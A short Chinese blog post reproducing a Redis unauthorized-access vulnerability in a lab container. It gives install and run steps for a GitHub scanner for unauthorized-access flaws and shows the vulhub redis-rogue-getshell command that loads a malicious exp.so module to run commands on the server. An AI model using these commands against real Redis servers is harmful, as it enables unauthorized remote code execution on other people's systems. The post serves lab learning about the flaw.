Redis未授权访问漏洞复现

Redis 简单使用

Redis 未设置密码,客户端工具可以直接链接。

Redis 是非关系型数据库系统,没有库表列的逻辑结构,仅仅以键值对的方式存储数据。

先启动容器

Redis 未设置密码,客户端工具可以直接链接

https://github.com/xk11z/unauthorized_com

这里上一个自动检测未授权漏洞的工具,中间挺多坑的,作者提供的安装步骤有问题,修改了一下

复制代码
git clone https://github.com/xk11z/unauthorized_com.git 

cd unauthorized_com

apt-get install python3-pip  

pip install -r requirements.txt 

python3 unauthorized_com.py

这里还是不能运行,需要修改几个文件

vim dic.py

这里要导入redis,可能需要下载

这里修改了一下检测代码

python3 unauthorized_com.py -i 192.168.142.151|grep redis

容器的作者还提供了一个方法

git clone https://github.com/vulhub/redis-rogue-getshell

编译

python3 redis-master.py -r 192.168.142.151 -p 6379 -L 192.168.142.151 -P 8888 -f RedisModulesSDK/exp.so -c "id"

可以看到,命令执行成功

相关推荐
csudata25 分钟前
绿色便携版PostgreSQL发行版重磅发布
数据库·postgresql
阳光九叶草LXGZXJ1 小时前
达梦数据库-学习-48-DmDrs控制台命令(同步之Manager、CPT模块)
linux·运维·数据库·sql·学习
我科绝伦(Huanhuan Zhou)1 小时前
脚本再升级,兼容Oracle 26ai一键安装
数据库·oracle
野生绿箭侠2 小时前
Ncos 2.3.2 版本集成达梦数据库
数据库
仍然.2 小时前
MYSQL--约束
数据库·mysql
乡野码圣3 小时前
【RK3588 Android12】RCU机制
java·jvm·数据库
亓才孓3 小时前
[数据库]应该注意的细节
数据库·sql
m0_561359674 小时前
掌握Python魔法方法(Magic Methods)
jvm·数据库·python
xxxmine4 小时前
redis学习
数据库·redis·学习
qq_5470261795 小时前
Redis 常见问题
数据库·redis·mybatis